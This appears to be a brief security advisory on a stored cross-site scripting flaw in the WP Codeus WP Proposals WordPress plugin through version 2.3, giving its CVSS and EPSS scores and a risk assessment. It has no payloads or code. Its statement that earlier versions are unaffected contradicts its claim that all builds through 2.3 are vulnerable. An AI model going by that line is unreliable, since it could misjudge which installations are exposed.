The vulnerability is a stored XSS flaw in the WP Codeus WP Proposals plugin. Improper sanitization of user input during web page generation allows an attacker to inject malicious scripts that are retained in proposal content. When any site visitor views the stored proposal, the browser executes the injected code in the context of the user, potentially enabling theft of session cookies, defacement, or other client‑side attacks. The weakness is identified as CWE‑79 and is reflected in a CVSS score of 5.9, indicating moderate impact.

All installations of the WP Proposals plugin up to and including version 2.3 are affected. The vulnerability is present in all builds from the earliest release through 2.3, so any WordPress site deploying WP Codeus WP Proposals at those versions is vulnerable. Site owners using earlier or later versions are not impacted.

The EPSS score is less than 1 %, suggesting a low probability of exploitation at present. The vulnerability is not listed in the CISA KEV catalogue. Exploitation requires an attacker to have access to the proposal submission interface, which may be restricted to authenticated users or administrators. However, if the plugin allows broader input from untrusted content authors, a standard web‑application attack can introduce and persist malicious scripts. Consequently, the overall risk is moderate, warranting timely remediation even if the exploitation likelihood appears low.